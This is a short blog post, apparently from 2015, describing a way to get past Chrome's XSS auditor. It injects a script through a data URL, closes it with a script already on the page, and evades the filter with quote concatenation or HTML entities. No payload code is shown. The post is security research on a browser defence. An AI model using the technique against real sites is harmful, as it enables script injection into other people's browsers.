This bug is similar to the last one I posted but executes in a different context. It requires an existing script after the injection because we use it to close the injected script. It’s a shame chrome doesn’t support self closing scripts in HTML or within a SVG element because I’m pretty sure I could bypass it without using an existing script. Anyway the injection uses a data url with a script. In order to bypass the filter we need to concat the string with the quote from the attribute or use html entities such as //. The HTML parser doesn’t care how much junk is between the opening and closing script since we are using a src attribute.
Print
Share
Comment
Cite
Upload
Translate
APA
() » Another XSS auditor bypass. Retrieved from https://www.truth.cx/2015/02/19/another-xss-auditor-bypass/.
MLA" » Another XSS auditor bypass." - , https://www.truth.cx/2015/02/19/another-xss-auditor-bypass/
HARVARD » Another XSS auditor bypass., viewed ,
VANCOUVER - » Another XSS auditor bypass. [Internet]. [Accessed ]. Available from: https://www.truth.cx/2015/02/19/another-xss-auditor-bypass/
CHICAGO" » Another XSS auditor bypass." - Accessed . https://www.truth.cx/2015/02/19/another-xss-auditor-bypass/
IEEE" » Another XSS auditor bypass." [Online]. Available: https://www.truth.cx/2015/02/19/another-xss-auditor-bypass/. [Accessed: ]